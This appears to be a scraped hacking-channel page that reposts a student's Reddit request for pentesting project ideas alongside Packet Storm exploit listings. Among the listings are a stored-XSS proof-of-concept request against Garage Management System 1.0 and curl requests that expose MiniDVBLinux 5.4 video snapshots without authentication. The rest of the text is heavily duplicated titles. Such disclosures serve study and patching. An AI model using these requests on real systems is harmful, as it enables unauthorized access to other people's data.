Please suggest a topic diploma project
https://www.reddit.com/r/Pentesting/comments/y6ag5y/please_suggest_a_topic_diploma_project/
I am a final year student of Network Security, and at the moment I want to choose a topic for my diploma project. I know programming well, I know a little pentesting and networking. As a topic, I think that it will be interesting to implement a program or service "Automatic pentesting for a corporate network". But I don't know how to implement it. To be more precise, I don’t know where to start studying. I studied pentesting only through TryHackMe and read the book "Art of Network Penetration Testing" If you have any ideas I would be grateful if you share. Please share even other difficult research topics in your opinion. submitted by /u/_hanabi_n (https://www.reddit.com/user/_hanabi_n)
[link] (https://www.reddit.com/r/Pentesting/comments/y6ag5y/please_suggest_a_topic_diploma_project/) [comments] (https://www.reddit.com/r/Pentesting/comments/y6ag5y/please_suggest_a_topic_diploma_project/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/Pentesting/comments/y6ag5y/please_suggest_a_topic_diploma_project/
I am a final year student of Network Security, and at the moment I want to choose a topic for my diploma project. I know programming well, I know a little pentesting and networking. As a topic, I think that it will be interesting to implement a program or service "Automatic pentesting for a corporate network". But I don't know how to implement it. To be more precise, I don’t know where to start studying. I studied pentesting only through TryHackMe and read the book "Art of Network Penetration Testing" If you have any ideas I would be grateful if you share. Please share even other difficult research topics in your opinion. submitted by /u/_hanabi_n (https://www.reddit.com/user/_hanabi_n)
[link] (https://www.reddit.com/r/Pentesting/comments/y6ag5y/please_suggest_a_topic_diploma_project/) [comments] (https://www.reddit.com/r/Pentesting/comments/y6ag5y/please_suggest_a_topic_diploma_project/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
Please suggest a topic diploma project
I am a final year student of Network Security, and at the moment I want to choose a topic for my diploma project. I know programming well, I know...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Garage Management System 1.0 Cross Site Scripting
https://3.bp.blogspot.com/-sRAbWielMtM/WWlvVvmDA-I/AAAAAAAAIN8/PunzJUFKKskcHl_zTOrA6xP6ETTvhbejQCLcBGAs/s1600/h46.png
Garage Management System version 1.0 suffers from a persistent cross site scripting vulnerability.
SHA-256 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Garage Management System 1.0 Cross Site Scripting
https://3.bp.blogspot.com/-sRAbWielMtM/WWlvVvmDA-I/AAAAAAAAIN8/PunzJUFKKskcHl_zTOrA6xP6ETTvhbejQCLcBGAs/s1600/h46.png
Garage Management System version 1.0 suffers from a persistent cross site scripting vulnerability.
SHA-256 |
afcae7081812521eaaa523ff4ed344d14f1a1dba5fe6ac30c17af09a9cfdbc41Download
# Exploit Title: Garage Management System 1.0 - 'categoriesName' - Stored
XSS
# Date: 18-09-2022
# Exploit Author: Sam Wallace
# Software Link:
https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html
# Version: 1.0
# Tested on: Debian
# CVE : CVE-2022-41358
Summary:
Garage Management System utilizes client side validation to prevent XSS.
Using burp, a request can be modified and replayed to the server bypassing
this validation which creates an avenue for XSS.
Parameter: categoriesName
URI: /garage/php_action/createCategories.php
POC:
POST /garage/php_action/createCategories.php HTTP/1.1
Host: 10.24.0.69
Content-Length: 367
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.24.0.69
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundaryqKDsN4gmatTEEkhS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.24.0.69/garage/add-category.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=gbklvcv3vvv987636urv0gg53u
Connection: close
------WebKitFormBoundaryqKDsN4gmatTEEkhS
Content-Disposition: form-data; name="categoriesName"
------WebKitFormBoundaryqKDsN4gmatTEEkhS
Content-Disposition: form-data; name="categoriesStatus"
1
------WebKitFormBoundaryqKDsN4gmatTEEkhS
Content-Disposition: form-data; name="create"
------WebKitFormBoundaryqKDsN4gmatTEEkhS--
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Garage Management System 1.0 Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Backdoor.Win32.DarkSky.23 MVID-2022-0648 Buffer Overflow
___________________________
@hacking_Attack
@Hacking_Video
Backdoor.Win32.DarkSky.23 MVID-2022-0648 Buffer Overflow
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Backdoor.Win32.DarkSky.23 MVID-2022-0648 Buffer Overflow
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
WiFi File Transfer 1.0.8 Cross Site Scripting
___________________________
@hacking_Attack
@Hacking_Video
WiFi File Transfer 1.0.8 Cross Site Scripting
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
WiFi File Transfer 1.0.8 Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
MiniDVBLinux 5.4 Unauthenticated Stream Disclosure
https://1.bp.blogspot.com/-vtYXiq7PjFk/WWlvT3pSItI/AAAAAAAAIN4/S7SZq03xxCsAAYdYEaQwiY4Z64tRJ_WvQCLcBGAs/s1600/h43.png
MiniDVBLinux versions 5.4 and below suffer from an unauthenticated live stream disclosure when /tpl/tv_action.sh is called and generates a snapshot in /var/www/images/tv.jpg through the Simple VDR Protocol (SVDRP).
SHA-256 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
MiniDVBLinux 5.4 Unauthenticated Stream Disclosure
https://1.bp.blogspot.com/-vtYXiq7PjFk/WWlvT3pSItI/AAAAAAAAIN4/S7SZq03xxCsAAYdYEaQwiY4Z64tRJ_WvQCLcBGAs/s1600/h43.png
MiniDVBLinux versions 5.4 and below suffer from an unauthenticated live stream disclosure when /tpl/tv_action.sh is called and generates a snapshot in /var/www/images/tv.jpg through the Simple VDR Protocol (SVDRP).
SHA-256 |
7a02e7cf0734c411e5e95eff4c56fee10e23d22efe0169ff42aae7db5349ec0eDownload
MiniDVBLinux 5.4 Unauthenticated Stream Disclosure Vulnerability
Vendor: MiniDVBLinux
Product web page: https://www.minidvblinux.de
Affected version:
Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple
way to convert a standard PC into a Multi Media Centre based on the
Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this
Linux based Digital Video Recorder: Watch TV, Timer controlled
recordings, Time Shift, DVD and MP3 Replay, Setup and configuration
via browser, and a lot more. MLD strives to be as small as possible,
modular, simple. It supports numerous hardware platforms, like classic
desktops in 32/64bit and also various low power ARM systems.
Desc: The application suffers from an unauthenticated live stream
disclosure when /tpl/tv_action.sh is called and generates a snapshot
in /var/www/images/tv.jpg through the Simple VDR Protocol (SVDRP).
--------------------------------------------------------------------
/var/www/tpl/tv_action.sh:
--------------------------
01: #!/bin/sh
02:
03: header
04:
05: quality=60
06: svdrpsend.sh "GRAB /tmp/tv.jpg $quality $(echo "$query" | sed "s/width=\(.*\)&height=\(.*\)/\1 \2/g")"
07: mv -f /tmp/tv.jpg /var/www/images 2>/dev/null
--------------------------------------------------------------------
Tested on: MiniDVBLinux 5.4
BusyBox v1.25.1
Architecture: armhf, armhf-rpi2
GNU/Linux 4.19.127.203 (armv7l)
VideoDiskRecorder 2.4.6
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5716
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5716.php
24.09.2022
--
1. Generate screengrab:
- Request: curl http://ip:8008/tpl/tv_action.sh -H "Accept: */*"
- Response:
220 mld SVDRP VideoDiskRecorder 2.4.6; Mon Sep 12 00:44:10 2022; UTF-8
250 Grabbed image /tmp/tv.jpg 60
221 mld closing connection
2. View screengrab:
- Request: curl http://ip:8008/images/tv.jpg
3. Or use a browser:
- http://ip:8008/home?site=remotecontrol
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
MiniDVBLinux 5.4 Unauthenticated Stream Disclosure
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Stripe Green Downloads 2.03 Cross Site Scripting
___________________________
@hacking_Attack
@Hacking_Video
Stripe Green Downloads 2.03 Cross Site Scripting
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Stripe Green Downloads 2.03 Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Joomla Vik Appointments 1.7.3 Cross Site Scripting
___________________________
@hacking_Attack
@Hacking_Video
Joomla Vik Appointments 1.7.3 Cross Site Scripting
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Joomla Vik Appointments 1.7.3 Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.